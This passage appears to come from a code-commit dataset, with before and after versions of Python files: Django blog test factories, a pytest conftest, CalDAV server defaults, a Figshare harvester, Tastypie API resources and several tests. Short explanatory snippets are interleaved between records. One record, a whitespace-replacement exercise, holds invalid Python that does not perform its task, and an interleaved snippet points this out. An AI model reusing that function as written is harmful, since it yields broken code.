,(0,64,0),(128,64,0),(0,192,0),(128,192,0),(0,64,128)]
# 16=potted plant, 17=sheep, 18=sofa, 19=train, 20=tv/monitor
def decode_labels(mask):
"""Decode batch of segmentation masks.
Args:
label_batch: result of inference after taking argmax.
Returns:
An batch of RGB images of the same size
"""
img = Image.new('RGB', (len(mask[0]), len(mask)))
pixels = img.load()
for j_, j in enumerate(mask):
for k_, k in enumerate(j):
if k < 21:
pixels[k_,j_] = label_colours[k]
return np.array(img)
def prepare_label(input_batch, new_size):
"""Resize masks and perform one-hot encoding.
Args:
input_batch: input tensor of shape [batch_size H W 1].
new_size: a tensor with new height and width.
Returns:
Outputs a tensor of shape [batch_size h w 21]
with last dimension comprised of 0's and 1's only.
"""
with tf.name_scope('label_encode'):
input_batch = tf.image.resize_nearest_neighbor(input_batch, new_size) # as labels are integer numbers, need to use NN interp.
input_batch = tf.squeeze(input_batch, squeeze_dims=[3]) # reducing the channel dimension.
input_batch = tf.one_hot(input_batch, depth=n_classes)
return input_batch
| mit | Python |
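The per-pixel loop in decode_labels can be replaced by indexing a palette array with the whole mask at once. An illustrative numpy sketch with a truncated colour table:
import numpy as np
label_colours = [(0, 0, 0), (128, 0, 0), (0, 128, 0)]  # truncated palette
palette = np.array(label_colours, dtype=np.uint8)
mask = np.array([[0, 1], [2, 1]])
rgb = palette[mask]   # fancy indexing maps every label to its RGB triple
print(rgb.shape)      # (2, 2, 3)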
a62b5955d9801f25736c42545191ff5a76a2e5b1 | Refactor UserFactory and add CommentFactory | andreagrandi/bloggato,andreagrandi/bloggato | blog/tests.py | blog/tests.py | from django.test import TestCase
from .models import BlogPost, Comment
from django.contrib.auth.models import User
class UserFactory(object):
def create(self, username="user001", email="[email protected]", password="password123456"):
user = User.objects.create_user(username = username, email = email, password = password)
return user
class BlogPostFactory(object):
def create(self, save=False):
blogpost = BlogPost()
blogpost.user = UserFactory().create()
blogpost.title = "Title Test"
blogpost.text = "Lorem ipsum tarapia tapioco..."
if save==True:
blogpost.save()
return blogpost
class CommentFactory(object):
def create(self, blogpost, text="Test comment", save=False):
comment = Comment()
comment.post = blogpost
comment.user = UserFactory().create("user002", "[email protected]", "password123456")
comment.text = text
if save==True:
comment.save()
return comment
class BlogTest(TestCase):
def setUp(self):
pass
def test_post_creation(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
def test_post_update(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
blogpost.title = "Title Test - modified"
blogpost.save()
blogpost_id = blogpost.id
blogpost_saved = BlogPost.objects.get(id = blogpost_id)
self.assertEquals(blogpost_saved.title, blogpost.title, "BlogPost updated correctly")
def test_post_delete(self):
blogpost = BlogPostFactory().create(True)
blogpost_id = blogpost.id
blogpost.delete()
blogpost_saved = BlogPost.objects.filter(id = blogpost_id)
self.assertEqual(blogpost_saved.count(), 0, "BlogPost deleted correctly")
| from django.test import TestCase
from .models import BlogPost
from django.contrib.auth.models import User
class UserFactory(object):
def create(self):
user = User.objects.create_user(username = "user001", email = "[email protected]", password = "password123456")
return user
class BlogPostFactory(object):
def create(self, save=False):
blogpost = BlogPost()
blogpost.user = UserFactory().create()
blogpost.title = "Title Test"
blogpost.text = "Lorem ipsum tarapia tapioco..."
if save==True:
blogpost.save()
return blogpost
class BlogTest(TestCase):
def setUp(self):
pass
def test_post_creation(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
def test_post_update(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
blogpost.title = "Title Test - modified"
blogpost.save()
blogpost_id = blogpost.id
blogpost_saved = BlogPost.objects.get(id = blogpost_id)
self.assertEquals(blogpost_saved.title, blogpost.title, "BlogPost updated correctly")
def test_post_delete(self):
blogpost = BlogPostFactory().create(True)
blogpost_id = blogpost.id
blogpost.delete()
blogpost_saved = BlogPost.objects.filter(id = blogpost_id)
self.assertEqual(blogpost_saved.count(), 0, "BlogPost deleted correctly")
| mit | Python |
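Hand-rolled factories like these are often replaced by the factory_boy library; a sketch of the equivalent, noting as an assumption that this project does not actually use it:
import factory
from django.contrib.auth.models import User
class UserFactory(factory.django.DjangoModelFactory):
    class Meta:
        model = User
    # Sequence gives each instance a distinct username; LazyAttribute
    # derives the email from it.
    username = factory.Sequence(lambda n: 'user%03d' % n)
    email = factory.LazyAttribute(lambda o: '%[email protected]' % o.username)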
420d104d9e674b96363db5c986ea9eea4d411c92 | Add updated template settings to conftests | st8st8/django-organizations,st8st8/django-organizations,bennylope/django-organizations,bennylope/django-organizations | conftest.py | conftest.py | """
Configuration file for py.test
"""
import django
def pytest_configure():
from django.conf import settings
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "test.sqlite3",
}
},
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
# The ordering here, the apps using the organization base models
# first and *then* the organizations app itself is an implicit test
# that the organizations app need not be installed in order to use
# its base models.
"test_accounts",
"test_vendors",
"organizations",
"test_custom",
],
MIDDLEWARE_CLASSES=[],
SITE_ID=1,
FIXTURE_DIRS=['tests/fixtures'],
ORGS_SLUGFIELD='autoslug.AutoSlugField',
ROOT_URLCONF="tests.urls",
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
},
]
)
django.setup()
| """
Configuration file for py.test
"""
import django
def pytest_configure():
from django.conf import settings
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "test.sqlite3",
}
},
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
# The ordering here, the apps using the organization base models
# first and *then* the organizations app itself is an implicit test
# that the organizations app need not be installed in order to use
# its base models.
"test_accounts",
"test_vendors",
"organizations",
"test_custom",
],
MIDDLEWARE_CLASSES=[],
SITE_ID=1,
FIXTURE_DIRS=['tests/fixtures'],
ORGS_SLUGFIELD='autoslug.AutoSlugField',
ROOT_URLCONF="tests.urls",
)
django.setup()
| bsd-2-clause | Python |
8d6287397b47fcaf98cadc59349f1db68c7b2d93 | Update 1.4_replace_whitespace.py | HeyIamJames/CodingInterviewPractice,HeyIamJames/CodingInterviewPractice | CrackingCodingInterview/1.4_replace_whitespace.py | CrackingCodingInterview/1.4_replace_whitespace.py | """
Replace all whitespace in a string with '%20'
"""
def replace(string):
for i in string:
string.replace("", %20)
return string
| """
Replace all whitespace in a string with '%20'
"""
| mit | Python |
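The recorded new_contents never performs the substitution: str.replace returns a new string rather than mutating in place, the arguments are in the wrong order, and a bare %20 is not valid Python. A corrected sketch of the exercise:
def replace_whitespace(s):
    # Build and return a new string; Python strings are immutable.
    return s.replace(' ', '%20')
assert replace_whitespace('Mr John Smith') == 'Mr%20John%20Smith'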
8a1b902b729597f5c8536b235d7add887f097fdd | Drop box should be off by default. SSL should be on by default, HTTP should be off. | trevor/calendarserver,trevor/calendarserver,trevor/calendarserver | twistedcaldav/config.py | twistedcaldav/config.py | ##
# Copyright (c) 2005-2006 Apple Computer, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DRI: David Reid, [email protected]
##
import os
from twistedcaldav.py.plistlib import readPlist
defaultConfigFile = '/etc/caldavd/caldavd.plist'
defaultConfig = {
'CreateAccounts': False,
'DirectoryService': {
'params': {'node': '/Search'},
'type': 'twistedcaldav.directory.appleopendirectory.OpenDirectoryService'
},
'DocumentRoot': '/Library/CalendarServer/Documents',
'DropBoxEnabled': False,
'ErrorLogFile': '/var/log/caldavd/error.log',
'ManholePort': 0,
'MaximumAttachmentSizeBytes': 1048576,
'NotificationsEnabled': False,
'PIDFile': '/var/run/caldavd.pid',
'Port': 8008,
'ResetAccountACLs': False,
'RunStandalone': True,
'SSLCertificate': '/etc/certificates/Default.crt',
'SSLEnable': True,
'SSLOnly': True,
'SSLPort': 8443,
'SSLPrivateKey': '/etc/certificates/Default.key',
'ServerLogFile': '/var/log/caldavd/server.log',
'ServerStatsFile': '/Library/CalendarServer/Documents/stats.plist',
'UserQuotaBytes': 104857600,
'Verbose': False,
'twistdLocation': '/usr/share/caldavd/bin/twistd',
'SACLEnable': False,
'AuthSchemes': ['Basic'],
'AdminPrincipals': ['/principal/users/admin']
}
class Config (object):
def __init__(self, defaults):
self.update(defaults)
def update(self, items):
items = items.iteritems()
for key, value in items:
setattr(self, key, value)
config = Config(defaultConfig)
def parseConfig(configFile):
if os.path.exists(configFile):
plist = readPlist(configFile)
config.update(plist)
| ##
# Copyright (c) 2005-2006 Apple Computer, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DRI: David Reid, [email protected]
##
import os
from twistedcaldav.py.plistlib import readPlist
defaultConfigFile = '/etc/caldavd/caldavd.plist'
defaultConfig = {
'CreateAccounts': False,
'DirectoryService': {
'params': {'node': '/Search'},
'type': 'twistedcaldav.directory.appleopendirectory.OpenDirectoryService'
},
'DocumentRoot': '/Library/CalendarServer/Documents',
'DropBoxEnabled': True,
'ErrorLogFile': '/var/log/caldavd/error.log',
'ManholePort': 0,
'MaximumAttachmentSizeBytes': 1048576,
'NotificationsEnabled': False,
'PIDFile': '/var/run/caldavd.pid',
'Port': 8008,
'ResetAccountACLs': False,
'RunStandalone': True,
'SSLCertificate': '/etc/certificates/Default.crt',
'SSLEnable': False,
'SSLOnly': False,
'SSLPort': 8443,
'SSLPrivateKey': '/etc/certificates/Default.key',
'ServerLogFile': '/var/log/caldavd/server.log',
'ServerStatsFile': '/Library/CalendarServer/Documents/stats.plist',
'UserQuotaBytes': 104857600,
'Verbose': False,
'twistdLocation': '/usr/share/caldavd/bin/twistd',
'SACLEnable': False,
'AuthSchemes': ['Basic'],
'AdminPrincipals': ['/principal/users/admin']
}
class Config (object):
def __init__(self, defaults):
self.update(defaults)
def update(self, items):
items = items.iteritems()
for key, value in items:
setattr(self, key, value)
config = Config(defaultConfig)
def parseConfig(configFile):
if os.path.exists(configFile):
plist = readPlist(configFile)
config.update(plist)
| apache-2.0 | Python |
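The Config class above turns plist keys into attributes, so each later update call overlays the defaults. A small self-contained usage sketch of the same shape, rendered in Python 3 (the original uses iteritems):
class Config(object):
    def __init__(self, defaults):
        self.update(defaults)
    def update(self, items):
        for key, value in items.items():
            setattr(self, key, value)
config = Config({'SSLEnable': True, 'Port': 8008})
config.update({'Port': 8443})          # a parsed plist would be passed here
print(config.Port, config.SSLEnable)   # 8443 True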
3e8d6e31f576fb857a1415c85a227f56225b8f06 | fix database path | SerhoLiu/serholiu.com,SerhoLiu/serholiu.com | blogconfig.py | blogconfig.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 博客名和简介
blogname = "I'm SErHo"
blogdesc = "SErHo's Blog, Please Call me Serho Liu."
blogcover = "//dn-serho.qbox.me/blogbg.jpg"
# Picky 目录和数据库
picky = "/home/serho/website/picky"
database = "/home/serho/website/newblog.db"
# 其他设置
# disqus = "serho"
# secret = "use random"
debug = False
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 博客名和简介
blogname = "I'm SErHo"
blogdesc = "SErHo's Blog, Please Call me Serho Liu."
blogcover = "//dn-serho.qbox.me/blogbg.jpg"
# Picky 目录和数据库
picky = "/home/serho/website/picky"
database = "//home/serho/website/newblog.db"
# 其他设置
# disqus = "serho"
# secret = "use random"
debug = False
| mit | Python |
1630bb891bf57052984301b9dd191826ca7ba18e | Update test_biobambam.py | Multiscale-Genomics/mg-process-fastq,Multiscale-Genomics/mg-process-fastq,Multiscale-Genomics/mg-process-fastq | tests/test_biobambam.py | tests/test_biobambam.py | """
.. Copyright 2017 EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os.path
import time
import pytest # pylint: disable=unused-import
from tool import biobambam_filter
def test_biobambam():
"""
Test case to ensure that BioBamBam works
"""
bbb = biobambam_filter.biobambam()
resource_path = os.path.join(os.path.dirname(__file__), "data/")
bbb.run(
[resource_path + "macs2.Human.DRR000150.22.bam"],
[]
)
print "Start : %s" % time.ctime()
time.sleep (10)
print "End : %s" % time.ctime()
assert os.path.isfile(resource_path + "macs2.Human.DRR000150.22.filtered.bam") is True
testFile = open(resource_path + "macs2.Human.DRR000150.22.filtered.bam")
print ("read line: ")
print (testFile.readline())
assert os.path.getsize(resource_path + "macs2.Human.DRR000150.22.filtered.bam") > 0
| """
.. Copyright 2017 EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os.path
import time
import pytest # pylint: disable=unused-import
from tool import biobambam_filter
def test_biobambam():
"""
Test case to ensure that BioBamBam works
"""
bbb = biobambam_filter.biobambam()
resource_path = os.path.join(os.path.dirname(__file__), "data/")
bbb.run(
[resource_path + "macs2.Human.DRR000150.22.bam"],
[]
)
print "Start : %s" % time.ctime()
time.sleep (10)
print "End : %s" % time.ctime()
assert os.path.isfile(resource_path + "macs2.Human.DRR000150.22.filtered.bam") is True
assert os.path.getsize(resource_path + "macs2.Human.DRR000150.22.filtered.bam") > 0
| apache-2.0 | Python |
8fa0dca5cd5187126a10197883348fc6b16544b5 | Test get campaigns by email | jakesen/pyhatchbuck | tests/test_campaigns.py | tests/test_campaigns.py | import os
import vcr
import unittest
from hatchbuck.api import HatchbuckAPI
from hatchbuck.objects import Contact
class TestCampaigns(unittest.TestCase):
def setUp(self):
# Fake key can be used with existing cassettes
self.test_api_key = os.environ.get("HATCHBUCK_API_KEY", "ABC123")
@vcr.use_cassette(
'tests/fixtures/cassettes/test_get_contact_campaigns.yml',
filter_query_parameters=['api_key']
)
def test_get_contact_campaigns(self):
hatchbuck = HatchbuckAPI(self.test_api_key)
contact_id = "d1F4Tm1tcUxVRmdFQmVIT3lhVjNpaUtxamprakk5S3JIUGRmVWtHUXJaRTE1"
contact = hatchbuck.search_contacts(contactId=contact_id)[0]
self.assertEqual(contact.contactId, contact_id)
campaigns = contact.get_campaigns()
self.assertEqual(campaigns[0].name, "Brochure Request Followup")
self.assertEqual(campaigns[0].step, 0)
self.assertEqual(campaigns[0].id, "b1BFUnM1Unh0MDVVOVJEWUc1d0pTM0pUSVY4QS0xOW5GRHRsS05DXzNXazE1")
@vcr.use_cassette(
'tests/fixtures/cassettes/test_get_contact_campaigns_by_email.yml',
filter_query_parameters=['api_key']
)
def test_get_contact_campaigns_by_email(self):
hatchbuck = HatchbuckAPI(self.test_api_key)
contact_email = "[email protected]"
campaigns = hatchbuck.get_campaigns(contact_email)
self.assertEqual(campaigns[0].name, "Brochure Request Followup")
self.assertEqual(campaigns[0].step, 0)
self.assertEqual(campaigns[0].id, "b1BFUnM1Unh0MDVVOVJEWUc1d0pTM0pUSVY4QS0xOW5GRHRsS05DXzNXazE1")
if __name__ == '__main__':
unittest.main()
| import os
import vcr
import unittest
from hatchbuck.api import HatchbuckAPI
from hatchbuck.objects import Contact
class TestCampaigns(unittest.TestCase):
def setUp(self):
# Fake key can be used with existing cassettes
self.test_api_key = os.environ.get("HATCHBUCK_API_KEY", "ABC123")
@vcr.use_cassette(
'tests/fixtures/cassettes/test_get_contact_campaigns.yml',
filter_query_parameters=['api_key']
)
def test_get_contact_campaigns(self):
hatchbuck = HatchbuckAPI(self.test_api_key)
contact_id = "d1F4Tm1tcUxVRmdFQmVIT3lhVjNpaUtxamprakk5S3JIUGRmVWtHUXJaRTE1"
contact = hatchbuck.search_contacts(contactId=contact_id)[0]
self.assertEqual(contact.contactId, contact_id)
campaigns = contact.get_campaigns()
self.assertEqual(campaigns[0].name, "Brochure Request Followup")
self.assertEqual(campaigns[0].id, "b1BFUnM1Unh0MDVVOVJEWUc1d0pTM0pUSVY4QS0xOW5GRHRsS05DXzNXazE1")
if __name__ == '__main__':
unittest.main()
| mit | Python |
d8a83ea3433948447c307a894b16c2b8a12247e8 | Kill defaulting to json for now. | safwanrahman/readthedocs.org,laplaceliu/readthedocs.org,cgourlay/readthedocs.org,techtonik/readthedocs.org,singingwolfboy/readthedocs.org,SteveViss/readthedocs.org,asampat3090/readthedocs.org,VishvajitP/readthedocs.org,dirn/readthedocs.org,singingwolfboy/readthedocs.org,sid-kap/readthedocs.org,techtonik/readthedocs.org,sunnyzwh/readthedocs.org,SteveViss/readthedocs.org,kenshinthebattosai/readthedocs.org,GovReady/readthedocs.org,rtfd/readthedocs.org,Carreau/readthedocs.org,atsuyim/readthedocs.org,agjohnson/readthedocs.org,tddv/readthedocs.org,dirn/readthedocs.org,dirn/readthedocs.org,michaelmcandrew/readthedocs.org,hach-que/readthedocs.org,takluyver/readthedocs.org,d0ugal/readthedocs.org,davidfischer/readthedocs.org,cgourlay/readthedocs.org,soulshake/readthedocs.org,Tazer/readthedocs.org,johncosta/private-readthedocs.org,royalwang/readthedocs.org,kenshinthebattosai/readthedocs.org,raven47git/readthedocs.org,safwanrahman/readthedocs.org,clarkperkins/readthedocs.org,titiushko/readthedocs.org,nyergler/pythonslides,Carreau/readthedocs.org,dirn/readthedocs.org,kenwang76/readthedocs.org,stevepiercy/readthedocs.org,KamranMackey/readthedocs.org,rtfd/readthedocs.org,raven47git/readthedocs.org,emawind84/readthedocs.org,wijerasa/readthedocs.org,sid-kap/readthedocs.org,SteveViss/readthedocs.org,stevepiercy/readthedocs.org,nikolas/readthedocs.org,sunnyzwh/readthedocs.org,LukasBoersma/readthedocs.org,kenwang76/readthedocs.org,takluyver/readthedocs.org,hach-que/readthedocs.org,GovReady/readthedocs.org,michaelmcandrew/readthedocs.org,attakei/readthedocs-oauth,techtonik/readthedocs.org,sid-kap/readthedocs.org,wijerasa/readthedocs.org,alex/readthedocs.org,sils1297/readthedocs.org,clarkperkins/readthedocs.org,istresearch/readthedocs.org,jerel/readthedocs.org,espdev/readthedocs.org,wanghaven/readthedocs.org,alex/readthedocs.org,fujita-shintaro/readthedocs.org,nikolas/readthedocs.org,GovReady/readthedocs.org,d0ugal/readthedocs.org,asampat3090/readthedocs.org,safwanrahman/readthedocs.org,ojii/readthedocs.org,sils1297/readthedocs.org,nyergler/pythonslides,mrshoki/readthedocs.org,emawind84/readthedocs.org,wijerasa/readthedocs.org,gjtorikian/readthedocs.org,royalwang/readthedocs.org,sid-kap/readthedocs.org,kdkeyser/readthedocs.org,KamranMackey/readthedocs.org,nyergler/pythonslides,mrshoki/readthedocs.org,davidfischer/readthedocs.org,hach-que/readthedocs.org,Carreau/readthedocs.org,safwanrahman/readthedocs.org,soulshake/readthedocs.org,rtfd/readthedocs.org,jerel/readthedocs.org,LukasBoersma/readthedocs.org,tddv/readthedocs.org,agjohnson/readthedocs.org,titiushko/readthedocs.org,kdkeyser/readthedocs.org,titiushko/readthedocs.org,SteveViss/readthedocs.org,LukasBoersma/readthedocs.org,rtfd/readthedocs.org,gjtorikian/readthedocs.org,tddv/readthedocs.org,CedarLogic/readthedocs.org,agjohnson/readthedocs.org,kenwang76/readthedocs.org,Tazer/readthedocs.org,attakei/readthedocs-oauth,espdev/readthedocs.org,nyergler/pythonslides,GovReady/readthedocs.org,laplaceliu/readthedocs.org,raven47git/readthedocs.org,takluyver/readthedocs.org,kenwang76/readthedocs.org,espdev/readthedocs.org,soulshake/readthedocs.org,mrshoki/readthedocs.org,singingwolfboy/readthedocs.org,kdkeyser/readthedocs.org,pombredanne/readthedocs.org,ojii/readthedocs.org,cgourlay/readthedocs.org,singingwolfboy/readthedocs.org,fujita-shintaro/readthedocs.org,mhils/readthedocs.org,CedarLogic/readthedocs.org,fujita-shintaro/readthedocs.org,jerel/readthedocs.org,mrshoki/readthedocs.org,attakei/readthedocs-oauth,istresearch/readthedocs.org,emawind84/readthedocs.org,mhils/readthedocs.org,takluyver/readthedocs.org,pombredanne/readthedocs.org,CedarLogic/readthedocs.org,Tazer/readthedocs.org,kenshinthebattosai/readthedocs.org,VishvajitP/readthedocs.org,hach-que/readthedocs.org,sils1297/readthedocs.org,clarkperkins/readthedocs.org,pombredanne/readthedocs.org,ojii/readthedocs.org,wanghaven/readthedocs.org,VishvajitP/readthedocs.org,Tazer/readthedocs.org,emawind84/readthedocs.org,CedarLogic/readthedocs.org,LukasBoersma/readthedocs.org,espdev/readthedocs.org,gjtorikian/readthedocs.org,nyergler/pythonslides,KamranMackey/readthedocs.org,johncosta/private-readthedocs.org,cgourlay/readthedocs.org,mhils/readthedocs.org,techtonik/readthedocs.org,atsuyim/readthedocs.org,soulshake/readthedocs.org,wanghaven/readthedocs.org,istresearch/readthedocs.org,davidfischer/readthedocs.org,titiushko/readthedocs.org,VishvajitP/readthedocs.org,laplaceliu/readthedocs.org,nikolas/readthedocs.org,laplaceliu/readthedocs.org,atsuyim/readthedocs.org,asampat3090/readthedocs.org,royalwang/readthedocs.org | api/base.py | api/base.py | from django.contrib.auth.models import User
from django.conf.urls.defaults import url
from django.core.urlresolvers import reverse
from tastypie.bundle import Bundle
from tastypie.resources import ModelResource
from tastypie import fields
from tastypie.authentication import BasicAuthentication
from tastypie.authorization import DjangoAuthorization, Authorization
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from builds.models import Build
from projects.models import Project
class EnhancedModelResource(ModelResource):
def obj_get_list(self, request=None, **kwargs):
"""
A ORM-specific implementation of ``obj_get_list``.
Takes an optional ``request`` object, whose ``GET`` dictionary can be
used to narrow the query.
"""
filters = None
if hasattr(request, 'GET'):
filters = request.GET
applicable_filters = self.build_filters(filters=filters)
applicable_filters.update(kwargs)
try:
return self.get_object_list(request).filter(**applicable_filters)
except ValueError, e:
raise NotFound("Invalid resource lookup data provided (mismatched type).")
class UserResource(ModelResource):
class Meta:
allowed_methods = ['get']
queryset = User.objects.all()
fields = ['username', 'first_name', 'last_name', 'last_login', 'id']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<username>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class ProjectResource(ModelResource):
user = fields.ForeignKey(UserResource, 'user')
class Meta:
include_absolute_url = True
allowed_methods = ['get']
queryset = Project.objects.all()
excludes = ['build_pdf', 'path', 'skip', 'featured']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class BuildResource(EnhancedModelResource):
project = fields.ForeignKey(ProjectResource, 'project')
class Meta:
allowed_methods = ['get']
queryset = Build.objects.all()
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<project__slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_list'), name="api_list_detail"),
]
| from django.contrib.auth.models import User
from django.conf.urls.defaults import url
from django.core.urlresolvers import reverse
from tastypie.bundle import Bundle
from tastypie.resources import ModelResource
from tastypie import fields
from tastypie.authentication import BasicAuthentication
from tastypie.authorization import DjangoAuthorization, Authorization
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from builds.models import Build
from projects.models import Project
class BaseResource(ModelResource):
def determine_format(self, *args, **kwargs):
return "application/json"
class EnhancedModelResource(BaseResource):
def obj_get_list(self, request=None, **kwargs):
"""
A ORM-specific implementation of ``obj_get_list``.
Takes an optional ``request`` object, whose ``GET`` dictionary can be
used to narrow the query.
"""
filters = None
if hasattr(request, 'GET'):
filters = request.GET
applicable_filters = self.build_filters(filters=filters)
applicable_filters.update(kwargs)
try:
return self.get_object_list(request).filter(**applicable_filters)
except ValueError, e:
raise NotFound("Invalid resource lookup data provided (mismatched type).")
class UserResource(BaseResource):
class Meta:
allowed_methods = ['get']
queryset = User.objects.all()
fields = ['username', 'first_name', 'last_name', 'last_login', 'id']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<username>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class ProjectResource(BaseResource):
user = fields.ForeignKey(UserResource, 'user')
class Meta:
include_absolute_url = True
allowed_methods = ['get']
queryset = Project.objects.all()
excludes = ['build_pdf', 'path', 'skip', 'featured']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class BuildResource(EnhancedModelResource):
project = fields.ForeignKey(ProjectResource, 'project')
class Meta:
allowed_methods = ['get']
queryset = Build.objects.all()
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<project__slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_list'), name="api_list_detail"),
]
| mit | Python |
69f46596f189786fce0e2a087e6870e5d3059331 | Fix figshare harvester date range (#764) | aaxelb/SHARE,CenterForOpenScience/SHARE,aaxelb/SHARE,CenterForOpenScience/SHARE,CenterForOpenScience/SHARE,aaxelb/SHARE | share/harvesters/com_figshare_v2.py | share/harvesters/com_figshare_v2.py | import pendulum
from furl import furl
from share.harvest import BaseHarvester
class FigshareHarvester(BaseHarvester):
VERSION = 1
page_size = 50
def _do_fetch(self, start_date, end_date):
url = furl(self.config.base_url).set(query_params={
'order_direction': 'asc',
'order': 'modified_date',
'page_size': self.page_size,
'modified_since': start_date.date().isoformat(),
})
return self.fetch_records(url, end_date.date())
def fetch_records(self, url, end_day):
page = 1
last_seen_day = None
while True:
page += 1
url.args['page'] = page
resp = self.requests.get(url.url)
if last_seen_day and resp.status_code == 422:
# We've asked for too much. Time to readjust date range
url.args['modified_since'] = last_seen_day.isoformat()
page = 0
continue
for item in resp.json():
resp = self.requests.get(item['url'])
detail = resp.json()
last_seen_day = pendulum.parse(detail['modified_date']).date()
if last_seen_day > end_day:
return
yield item['url'], detail
if len(resp.json()) < self.page_size:
return # We've hit the end of our results
| import pendulum
from furl import furl
from share.harvest import BaseHarvester
class FigshareHarvester(BaseHarvester):
VERSION = 1
page_size = 50
def do_harvest(self, start_date, end_date):
return self.fetch_records(furl(self.config.base_url).set(query_params={
'order_direction': 'asc',
'order': 'modified_date',
'page_size': self.page_size,
'modified_date': start_date.date().isoformat(),
}).url, end_date.date())
def fetch_records(self, url, end_day):
page, detail = 0, None
while True:
page += 1
resp = self.requests.get(furl(url).add(query_params={
'page': page,
}).url)
if resp.status_code == 422:
# We've asked for too much. Time to readjust date range
# Thanks for leaking variables python
page, url = 0, furl(url).add(query_params={
'modified_date': pendulum.parse(detail['modified_date']).date().isoformat()
})
continue
for item in resp.json():
resp = self.requests.get(item['url'])
detail = resp.json()
if pendulum.parse(detail['modified_date']).date() > end_day:
return
yield item['url'], detail
if len(resp.json()) < self.page_size:
return # We've hit the end of our results
| apache-2.0 | Python |
83f54f57170115cda98e7d1aa68972c60b865647 | Fix test_upgrades_to_html.py test | Connexions/cnx-upgrade | cnxupgrade/tests/test_upgrades_to_html.py | cnxupgrade/tests/test_upgrades_to_html.py | # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""Tests for to_html command-line interface.
"""
import sys
import unittest
from . import DB_CONNECTION_STRING
class ToHtmlTestCase(unittest.TestCase):
def call_target(self, **kwargs):
from ..upgrades import to_html
return to_html.cli_command(**kwargs)
def test(self):
# Mock produce_html_for_modules
if 'cnxarchive.to_html' in sys.modules:
del sys.modules['cnxarchive.to_html']
import cnxarchive.to_html as to_html
original_func = to_html.produce_html_for_modules
self.addCleanup(setattr, to_html, 'produce_html_for_modules',
original_func)
self.call_count = 0
def f(*args, **kwargs):
self.call_count += 1
self.args = args
self.kwargs = kwargs
return []
to_html.produce_html_for_modules = f
self.call_target(db_conn_str=DB_CONNECTION_STRING,
id_select_query='SELECT 2',
overwrite_html=False)
# Assert produce_html_for_modules is called
self.assertEqual(self.call_count, 1)
self.assertEqual(str(type(self.args[0])),
"<type 'psycopg2._psycopg.connection'>")
self.assertEqual(self.args[1], 'SELECT 2')
self.assertEqual(self.kwargs, {'overwrite_html': False})
| # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""Tests for to_html command-line interface.
"""
import sys
import unittest
from . import DB_CONNECTION_STRING
class ToHtmlTestCase(unittest.TestCase):
def call_target(self, **kwargs):
from ..upgrades import to_html
